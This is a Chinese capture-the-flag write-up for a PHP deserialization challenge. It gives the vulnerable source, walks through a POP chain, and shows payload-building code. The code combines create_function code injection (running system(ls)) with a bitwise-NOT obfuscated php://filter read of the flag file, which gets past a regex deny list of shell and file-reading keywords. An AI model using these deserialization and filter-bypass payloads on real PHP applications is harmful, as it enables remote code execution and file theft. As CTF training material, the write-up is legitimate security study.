BUUCTF-日刷-[DASCTF Sept X 浙江工业大学秋季挑战赛]hellounser/反序列化-正则过滤

<?php
class A {
    public $var;
    public function show(){
        echo $this->var;
    }
    public function __invoke(){
        $this->show();
    }
}

class B{
    public $func;
    public $arg;
    
    public function show(){
        $func = $this->func;
        if(preg_match('/^[a-z0-9]*$/isD', $this->func) || preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log/i', $this->arg)) { 
            die('No!No!No!'); 
        } else { 
            include "flag.php";
            //There is no code to print flag in flag.php
            $func('', $this->arg); 
        }
    }
    
    public function __toString(){
        $this->show();
        return "<br>"."Nice Job!!"."<br>";
    }
    
    
}

if(isset($_GET['pop'])){
    $aaa = unserialize($_GET['pop']);
    $aaa();
}
else{
    highlight_file(__FILE__);
}

?>

思路很明显，要执行B类中的show函数，来包含flag（但是它这个包含也不会输出，这里等会分析）

 

 

 怎么执行是看A类

 

 

 __invoke函数是调用A类时候会触发，调用A类，触发show方法，show方法输出 $var。

而让$var等于B类，B类中的__toString()方法会调用B的show函数

 

 

 至于怎么调用A类，这里传入pop参数，反序列化后，原代码会调用pop反序列化

 

 

 

 

那么下面就是分析如何反序列化到A类的show方法时能够包含

 public function show(){
        $func = $this->func;
        if(preg_match('/^[a-z0-9]*$/isD', $this->func) || preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log/i', $this->arg)) { 
            die('No!No!No!'); 
        } else { 
            include "flag.php";
            //There is no code to print flag in flag.php
            $func('', $this->arg); 
        }
    }

先看正则表达式，前面是$func不能是开头到结尾纯数字字母，i是大小写都匹配，s是匹配任何空白符号（空格，制表）,D是结尾不是换行符号

这里很好绕过，比如var_dump含有一个_即可绕过。或者开头换行符号都可以

后面是$arg过滤了一大堆东西，

都满足就会包含flag.php，但没啥用,因为没输出。同时会把$当作函数名，传入两个参数，一个是空字符串，一个是$arg

 

既然包含没用，不如从后面函数执行想办法，首先这个函数是要有两个参数，还能任意命令执行的

这里对着手册很快能找到函数create_function，传入

return(1);}任意代码;//

}会和前面{闭合，后面注释符号会注释后面的{，实现执行任意代码（一开始用/*注释，但是被过滤了）

$a = new A;
$b = new B;
$b->func="create_function";
$b->arg='return(1);}system(ls);//';;
$a->var=$b;
$ser = serialize($a);
echo $ser;

构造如上代码

 

 看到tru3flag.php猜测这个是真flag

但是过滤有很多，单双引号，flag，小数点全过滤了，这里用到取反

但是还有一个问题是取反后的符号大多数不可打印符号，不方便复制get传入，因此要对他进行url编码

$ac=(~('php://filter/read=convert.base64-encode/resource=Tru3flag.php'));
$at='return(1);}require(~('.strval($ac).'));//';
$a = new A;
$b = new B;
$b->func="create_function";;
$b->arg=$at;
$a->var=$b;
$ser = serialize($a);
//echo $ser;
echo urlencode($ser);

这里用伪协议读取php内容